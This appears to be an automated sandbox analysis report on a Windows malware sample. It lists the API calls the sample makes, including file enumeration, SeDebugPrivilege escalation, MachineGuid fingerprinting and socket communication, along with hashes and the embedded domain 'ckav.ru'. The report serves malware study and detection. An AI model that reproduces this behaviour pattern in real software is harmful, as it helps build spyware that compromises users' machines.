411cc0 10368->10370 10371 402bab 2 API calls 10369->10371 10387 405eb6 10370->10387 10371->10363 10373 411d3c 10374 4031e5 4 API calls 10373->10374 10380 411d7b 10374->10380 10375 411ea6 10376 4031e5 4 API calls 10375->10376 10377 411eb5 10376->10377 10378 4031e5 4 API calls 10377->10378 10379 411ed6 10378->10379 10381 405eb6 4 API calls 10379->10381 10380->10375 10382 4031e5 GetProcessHeap RtlAllocateHeap GetProcAddress GetPEB 10380->10382 10383 405eb6 4 API calls 10380->10383 10381->10363 10382->10380 10383->10380 10385 4031e5 4 API calls 10384->10385 10386 404afd 10385->10386 10386->10367 10388 405998 4 API calls 10387->10388 10389 405ec8 10388->10389 10389->10373 9652 40f6b8 9653 41219c 14 API calls 9652->9653 9654 40f6c7 9653->9654 9655 41219c 14 API calls 9654->9655 9656 40f6d5 9655->9656 9657 41219c 14 API calls 9656->9657 9658 40f6df 9657->9658 9677 40d6bd 9678 4056bf 2 API calls 9677->9678 9679 40d6c9 9678->9679 9690 404cbf 9679->9690 9682 404cbf 8 API calls 9683 40d6f4 9682->9683 9684 404cbf 8 API calls 9683->9684 9685 40d702 9684->9685 9686 413aca 4 API calls 9685->9686 9687 40d711 9686->9687 9688 405695 2 API calls 9687->9688 9689 40d71f 9688->9689 9691 402b7c 2 API calls 9690->9691 9692 404ccd 9691->9692 9693 404ddc 9692->9693 9694 404b8f 5 API calls 9692->9694 9693->9682 9695 404ce4 9694->9695 9696 404dd4 9695->9696 9698 402b7c 2 API calls 9695->9698 9697 402bab 2 API calls 9696->9697 9697->9693 9707 404d04 9698->9707 9699 404dcc 9700 404a39 5 API calls 9699->9700 9700->9696 9701 404dc6 9702 402bab 2 API calls 9701->9702 9702->9699 9703 402b7c 2 API calls 9703->9707 9704 404b8f 5 API calls 9704->9707 9705 404a39 5 API calls 9705->9707 9706 405b6f 6 API calls 9706->9707 9707->9699 9707->9701 9707->9703 9707->9704 9707->9705 9707->9706 9708 404cbf 8 API calls 9707->9708 9709 402bab GetProcessHeap HeapFree 9707->9709 9708->9707 9709->9707 9710 40f0bf 9711 4056bf 2 API calls 9710->9711 9712 40f0c9 9711->9712 9713 40f115 9712->9713 9715 404cbf 8 API calls 9712->9715 9714 41219c 14 API calls 9713->9714 9716 40f128 9714->9716 9717 40f0ed 9715->9717 9718 404cbf 8 API calls 9717->9718 9719 40f0fb 9718->9719 9720 413aca 4 API calls 9719->9720 9721 40f10a 9720->9721 9722 405695 2 API calls 9721->9722 9722->9713

                                Executed Functions

                                Function 00403D74 Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 141 403d74-403d90 call 4067c4 144 403d96-403da9 call 405b6f 141->144 145 403ea9-403ec0 call 405b6f 141->145 150 403ea6-403ea8 144->150 151 403daf-403dcb call 4031e5 FindFirstFileW 144->151 152 403f95 145->152 153 403ec6-403ee2 call 4031e5 FindFirstFileW 145->153 150->145 161 403dd1-403dd8 151->161 162 403e9d-403ea4 call 402bab 151->162 155 403f97-403f9d 152->155 159 403ee8-403ef8 call 405d24 153->159 160 403f8e-403f94 call 402bab 153->160 176 403f03-403f0a 159->176 177 403efa-403f01 159->177 160->152 166 403e75-403e90 call 4031e5 FindNextFileW 161->166 167 403dde-403de2 161->167 162->150 166->161 180 403e96-403e97 call 403bef 166->180 168 403e12-403e22 call 405d24 167->168 169 403de4-403df9 call 405eff 167->169 189 403e30-403e4c call 405b6f 168->189 190 403e24-403e2e 168->190 169->166 186 403dfb-403e10 call 405eff 169->186 182 403f12-403f2d call 405b6f 176->182 183 403f0c-403f10 176->183 177->176 181 403f41-403f5c call 4031e5 FindNextFileW 177->181 193 403e9c 180->193 196 403f87-403f88 call 403bef 181->196 197 403f5e-403f61 181->197 182->181 199 403f2f-403f33 182->199 183->181 183->182 186->166 186->168 189->166 204 403e4e-403e6f call 403d74 call 402bab 189->204 190->166 190->189 193->162 205 403f8d 196->205 197->159 202 403f75-403f85 call 402bab call 403bef 199->202 203 403f35-403f36 call 40fa23 199->203 202->155 209 403f39-403f40 call 402bab 203->209 204->166 217 403f63-403f73 call 402bab call 403bef 204->217 205->160 209->181 217->155
                                APIs
                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403DC4
                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403E8C
                                • FindFirstFileW.KERNELBASE(00000000,?,00000000,D4F4ACEA,00000000,00000000,00000001,00000000,00000000), ref: 00403EDB
                                • FindNextFileW.KERNELBASE(00000000,00000010,00000000,CE4477CC,00000000,00000000), ref: 00403F58
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: FileFind$FirstNext
                                • String ID: %s\%s$%s\*$Program Files$Windows
                                • API String ID: 1690352074-2009209621
                                • Opcode ID: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                • Instruction ID: acb13e71dd503001dda9649917d64d786dba47cd8022a2b45c5045a1a8a297e9
                                • Opcode Fuzzy Hash: 1e3e6a10e2b9ec909b5a5a789c8a5300318a12692afde49798013ba2296699ae
                                • Instruction Fuzzy Hash: A651F3329006197AEB14AEB4DD8AFAB3B6CDB45719F10013BF404B51C1EA7CEF80865C
                                Function 0040650A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 67COMMON
                                Download Yara Rule
                                APIs
                                • LookupPrivilegeValueW.ADVAPI32(00000000,SeDebugPrivilege,?,00000009,C6C3ECBB,00000000,00000000,?,00000000,?,?,?,?,?,0040F9DC), ref: 0040654E
                                • AdjustTokenPrivileges.KERNELBASE(?,00000000,?,00000010,00000000,00000000,00000009,C1642DF2,00000000,00000000,00000000,?,00000000), ref: 00406589
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: AdjustLookupPrivilegePrivilegesTokenValue
                                • String ID: SeDebugPrivilege
                                • API String ID: 3615134276-2896544425
                                • Opcode ID: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                • Instruction ID: 1578144bc241a5b33ff73db231d5495ab0f4fd5df9d31338026c5631bf24f4b3
                                • Opcode Fuzzy Hash: e2948c256eaff89fcf02f3bc2ef1638e4caf3df8a7acb90b2cc554f1a6e3f5aa
                                • Instruction Fuzzy Hash: A1117331A00219BAD710EEA79D4AEAF7ABCDBCA704F10006EB504F6181EE759B018674
                                Function 00402B7C Relevance: 3.0, APIs: 2, Instructions: 20memoryCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                • RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess
                                • String ID:
                                • API String ID: 1357844191-0
                                • Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                • Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
                                • Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
                                • Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9
                                Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON
                                Download Yara Rule
                                APIs
                                • recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: recv
                                • String ID:
                                • API String ID: 1507349165-0
                                • Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                • Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
                                • Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
                                • Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88
                                Function 004061C3 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 151COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 223 4061c3-4061f2 call 402bf2 call 4031e5 229 4061f4-4061ff GetLastError 223->229 230 40622a-40623b call 402b7c 223->230 232 406201-406203 229->232 233 406208-406228 call 4060ac call 4031e5 229->233 237 40624c-406258 call 402b7c 230->237 238 40623d-406249 call 40338c 230->238 235 406329-40632e 232->235 233->230 233->232 246 406269-406290 call 4031e5 GetTokenInformation 237->246 247 40625a-406266 call 40338c 237->247 238->237 253 406292-4062a0 call 402b7c 246->253 254 4062fe-406302 246->254 247->246 253->254 262 4062a2-4062b9 call 406086 253->262 256 406304-406307 call 403c40 254->256 257 40630d-40630f 254->257 263 40630c 256->263 260 406311-406317 call 402bab 257->260 261 406318-40631e 257->261 260->261 265 406320-406326 call 402bab 261->265 266 406327 261->266 272 4062f5-4062fd call 402bab 262->272 273 4062bb-4062e4 call 4031e5 262->273 263->257 265->266 266->235 272->254 273->272 279 4062e6-4062ec call 405b6f 273->279 281 4062f1-4062f3 279->281 281->272
                                APIs
                                • GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
                                • _wmemset.LIBCMT ref: 00406244
                                • _wmemset.LIBCMT ref: 00406261
                                • GetTokenInformation.KERNELBASE(IDA,00000001,00000000,00000000,?,00000009,ECAE3497,00000000,00000000,00000000), ref: 0040628C
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: _wmemset$ErrorInformationLastToken
                                • String ID: IDA$IDA
                                • API String ID: 487585393-2020647798
                                • Opcode ID: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                • Instruction ID: 96d4363135ba53d30ed73ccdf96fe48b30064626948d25b168d4296351bbaec2
                                • Opcode Fuzzy Hash: a5e5aa255662804c4e67c84550f50b624ac64f77e5461781f5e6cba767b6fa0d
                                • Instruction Fuzzy Hash: 6641B372900206BAEB10AFE69C46EEF7B7CDF95714F11007FF901B61C1EE799A108668
                                Function 00404E17 Relevance: 7.6, APIs: 5, Instructions: 72networkCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 536 404e17-404e57 getaddrinfo 537 404e59-404e5b 536->537 538 404e5d-404e84 call 402b7c socket 536->538 539 404ecf-404ed3 537->539 542 404e86-404e96 call 402bab freeaddrinfo 538->542 543 404e98-404ea7 connect 538->543 554 404ec7-404ec9 542->554 545 404eb3-404ebe freeaddrinfo 543->545 546 404ea9-404eb1 call 404de5 543->546 548 404ec0-404ec6 call 402bab 545->548 549 404ecb 545->549 546->545 548->554 553 404ecd-404ece 549->553 553->539 554->553
                                APIs
                                • getaddrinfo.WS2_32(00000000,00000001,?,00000000), ref: 00404E4F
                                • socket.WS2_32(?,?,?), ref: 00404E7A
                                • freeaddrinfo.WS2_32(00000000), ref: 00404E90
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: freeaddrinfogetaddrinfosocket
                                • String ID:
                                • API String ID: 2479546573-0
                                • Opcode ID: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                • Instruction ID: d63855dbb6a3d3c0c8ebf90f2bb9ce8455fd2b7eef63007fec5ba55d39dacf84
                                • Opcode Fuzzy Hash: 9c818cadf116e8ca79a2f09a86e0f8d7b5ee6602657faf0bd8bae176804bdd2a
                                • Instruction Fuzzy Hash: 9621BBB2500109FFCB106FA0ED49ADEBBB5FF88315F20453AF644B11A0C7399A919B98
                                Function 004040BB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129filememoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 556 4040bb-4040f2 call 4031e5 CreateFileW 559 4040f8-404111 call 4031e5 556->559 560 40418d-404190 556->560 571 404113-404119 559->571 572 40417a 559->572 562 404192-4041a7 call 403c90 560->562 563 404184 560->563 562->563 568 4041a9-4041b8 call 403c59 562->568 565 404186-40418c 563->565 576 4041ba-4041d8 call 4040bb call 403d44 568->576 577 4041db-4041e4 call 402bab 568->577 571->572 575 40411b-404120 571->575 574 40417d-40417e call 403c40 572->574 583 404183 574->583 579 404122 575->579 580 404124-404140 call 4031e5 VirtualAlloc 575->580 576->577 577->565 579->580 580->572 589 404142-40415e call 4031e5 ReadFile 580->589 583->563 589->574 593 404160-404178 call 4031e5 589->593 593->574
                                APIs
                                • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,00000000), ref: 004040E8
                                • VirtualAlloc.KERNELBASE(00000000,00000000,00001000,00000004,00000000,D4EAD4E2,00000000,00000000), ref: 0040413A
                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000,00000000,CD0C9940,00000000,00000000), ref: 0040415A
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$AllocCreateReadVirtual
                                • String ID: .tmp
                                • API String ID: 3585551309-2986845003
                                • Opcode ID: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                • Instruction ID: b436c3373f33a6751ef3154d9799880e4ac32c23f8ae8b62b11f674aa4b57f97
                                • Opcode Fuzzy Hash: 9631e6f5e9699617cd127c849230d2104622380ed218987cebf5414177a879fc
                                • Instruction Fuzzy Hash: 2C31F87150112477D721AE664C49FDF7E6CDFD67A4F10003AFA08BA2C1DA799B41C2E9
                                Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147synchronizationCOMMON
                                Download Yara Rule
                                APIs
                                • SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
                                • CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
                                • GetLastError.KERNEL32 ref: 0041399E
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Error$CreateLastModeMutex
                                • String ID:
                                • API String ID: 3448925889-0
                                • Opcode ID: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                • Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
                                • Opcode Fuzzy Hash: 5dd40e4cfd1fe52203b1fe5968f304513c4092ad3980e50a04d496178e49115f
                                • Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E
                                Function 004042CF Relevance: 4.6, APIs: 3, Instructions: 60fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNELBASE(00000000,C0000000,00000000,00000000,00000004,00000080,00000000,00000000,E9FABB88,00000000,00000000,00000000,00000001,?,?,004146E2), ref: 004042F9
                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00000002,00000000,EEBAAE5B,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000,00000000), ref: 00404314
                                • WriteFile.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,C148F916,00000000,00000000,?,?,004146E2,00000000,00000000,?,00000000), ref: 00404334
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CreatePointerWrite
                                • String ID:
                                • API String ID: 3672724799-0
                                • Opcode ID: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                • Instruction ID: 60e70a0f6cedc7b52d1efda55ce7422740d02a59a4e71dca7f773cbcdc95941a
                                • Opcode Fuzzy Hash: b52d99f42f68723aef5fd834f3fc6c8fdb7b2d5b4e411be9fbae0770ffe78be6
                                • Instruction Fuzzy Hash: 2F014F315021343AD6356A679C0EEEF6D5DDF8B6B5F10422AFA18B60D0EA755B0181F8
                                Function 00412D31 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 178threadCOMMON
                                Download Yara Rule
                                APIs
                                • CreateThread.KERNELBASE(00000000,00000000,0041289A,00000000,00000000,?,00000000,FCAE4162,00000000,00000000,?,?,?,?,00000001,00000000), ref: 00412F53
                                  • Part of subcall function 0040632F: _wmemset.LIBCMT ref: 0040634F
                                  • Part of subcall function 00402BAB: GetProcessHeap.KERNEL32(00000000,00000000), ref: 00402BB9
                                  • Part of subcall function 00402BAB: HeapFree.KERNEL32(00000000), ref: 00402BC0
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$CreateFreeProcessThread_wmemset
                                • String ID: ckav.ru
                                • API String ID: 2915393847-2696028687
                                • Opcode ID: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                • Instruction ID: 4531c2d42d5f5f74382d08a8027233dc497c0745a20cb628f46216a694decd77
                                • Opcode Fuzzy Hash: eacd1f59d46a33f08cf175cca3b3b274a2abcb1d178fb3fa8030531899280e62
                                • Instruction Fuzzy Hash: 7751B7728005047EEA113B62DD4ADEB3669EB2034CB54423BFC06B51B2E67A4D74DBED
                                Function 0040632F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 35COMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                • _wmemset.LIBCMT ref: 0040634F
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateProcess_wmemset
                                • String ID: CA
                                • API String ID: 2773065342-1052703068
                                • Opcode ID: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                • Instruction ID: fc433e2548431d42ded6bbe1dab57db4bffb986d933035261d01f02eae51e62b
                                • Opcode Fuzzy Hash: a8ac9dcd0bdef4118ea85f480caa20ceae6cf91017b4610bad34c656c12023a0
                                • Instruction Fuzzy Hash: 0FE09B62A4511477D121A9665C06EAF76AC8F41B64F11017FFC05B62C1E9BC9E1101FD
                                Function 00406086 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 15COMMON
                                Download Yara Rule
                                APIs
                                • GetTokenInformation.KERNELBASE(?,00000000,00000001,?,004062B4,00000009,ECAE3497,00000000,00000000,IDA,004062B4,IDA,00000001,00000000,?,?), ref: 004060A8
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: InformationToken
                                • String ID: IDA
                                • API String ID: 4114910276-365204570
                                • Opcode ID: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                • Instruction ID: 313645685f6ff1854c13b9bf72d10cc52e042395484f5c11e0c3c7a214e99d66
                                • Opcode Fuzzy Hash: 947dba5d192e13df99ca19526492baac9a77df32751a8a878116f3f8cb9ab45e
                                • Instruction Fuzzy Hash: F4D0C93214020DBFEF025EC1DC02F993F2AAB08754F008410BB18280E1D6B39670AB95
                                Function 00402C03 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 13libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetProcAddress.KERNELBASE(?,s1@,00000000,CEB18ABC,00000000,00000000,?,00403173,?,00000000), ref: 00402C1B
                                Strings
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc
                                • String ID: s1@
                                • API String ID: 190572456-427247929
                                • Opcode ID: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                • Instruction ID: 1fbf97b0b55819c82851c7ea3a697f1c0796d20c97a22cfecd58a5260392007e
                                • Opcode Fuzzy Hash: 111d3fe3cf3de278b88478875a5240f52c9cc91b538b26207c7303d9e6a3f6a3
                                • Instruction Fuzzy Hash: A5C048B10142087EAE016EE19C05CBB3F5EEA44228B008429BD18E9122EA3ADE2066A4
                                Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63registryCOMMON
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
                                  • Part of subcall function 00402B7C: RtlAllocateHeap.NTDLL(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C
                                • RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
                                • RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: Heap$AllocateOpenProcessQueryValue
                                • String ID:
                                • API String ID: 1425999871-0
                                • Opcode ID: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                • Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
                                • Opcode Fuzzy Hash: cde82c20d06cc90513d2926ae88c3b2314f77feeb194b7ecfbb340b9f5de6e47
                                • Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9
                                Function 004060BD Relevance: 1.6, APIs: 1, Instructions: 53COMMON
                                Download Yara Rule
                                APIs
                                • CheckTokenMembership.KERNELBASE(00000000,00000000,00000000,00000009,E3B938DF,00000000,00000000,00000001), ref: 00406115
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: CheckMembershipToken
                                • String ID:
                                • API String ID: 1351025785-0
                                • Opcode ID: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                • Instruction ID: 8b780b9e56efd5f2a9a2252a5f210822aeafba94d0ba5a8497d60ad8274f78a0
                                • Opcode Fuzzy Hash: 4a43c4ed47dff20a0e63da0344eb6b70d0e7b4795f78c2e23bdd5dfdab477f71
                                • Instruction Fuzzy Hash: 7801867195020DBEEB00EBE59C86EFFB77CEF08208F100569B515B60C2EA75AF008764
                                Function 00403C62 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNELBASE(00413D1F,00000000,00000000,C8F0A74D,00000000,00000000,00000000,?,00413D1F,00000000), ref: 00403C8B
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: CreateDirectory
                                • String ID:
                                • API String ID: 4241100979-0
                                • Opcode ID: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                • Instruction ID: 8def336d827aa123259dd30fe2d1f4df156212ecddfe904d71fbacf529eca846
                                • Opcode Fuzzy Hash: d413ab25134c4b1c761ae7c40b175d3f6038492197e92d4c0305fa2d5b60993a
                                • Instruction Fuzzy Hash: 47D05E320450687A9A202AA7AC08CDB3E0DDE032FA7004036B81CE4052DB26861191E4
                                Function 0040642C Relevance: 1.5, APIs: 1, Instructions: 18COMMON
                                Download Yara Rule
                                APIs
                                • GetNativeSystemInfo.KERNELBASE(?,00000000,E9AF4586,00000000,00000000,?,?,?,?,004144CF,00000000,00000000,00000000,00000000), ref: 00406445
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: InfoNativeSystem
                                • String ID:
                                • API String ID: 1721193555-0
                                • Opcode ID: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                • Instruction ID: 89a273ea7bbabd9d74fc824e7d15e3b55fbc967ee531cdb223f62f0d5b23fb21
                                • Opcode Fuzzy Hash: 18b792e9f3ed795f2423495cf2abf5b642ecf28d7d26812d11fe043f37d9eb75
                                • Instruction Fuzzy Hash: 60D0C9969142082A9B24FEB14E49CBB76EC9A48104B400AA8FC05E2180FD6ADF5482A5
                                Function 00404EEA Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON
                                Download Yara Rule
                                APIs
                                • send.WS2_32(00000000,00000000,00000000,00000000), ref: 00404F07
                                Memory Dump Source
                                • Source File: 00000002.00000002.2182210886.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_400000_aspnet_compiler.jbxd
                                Yara matches
                                Similarity
                                • API ID: send
                                • String ID:
                                • API String ID: 2809346765-0
                                • Opcode ID: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                • Instruction ID: 973ad19c2726000f66dbac5dad6f1ecaf56acd36cc9bde1755ab86a88c27f217
                                • Opcode Fuzzy Hash: f5f37575630baef1eb429ccea87373dc8bd2737f5fb4b11d46726e1bb86e5636
                                • Instruction Fuzzy Hash: F8D09231140209BBEF016E55EC05BAA3B69EF44B54F10C026BA18991A1DB31A9219A98
                                Function 00403BD0 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                Download Yara Rule
                                APIs
                                • MoveFileExW.KERNELBASE(00000000,00412C16,?,00000000,C9143177,00000000,00000000,?,004040B6,00000000,00412C16,00000001,?,00412C16,00000000,00000000), ref: 00403BEB
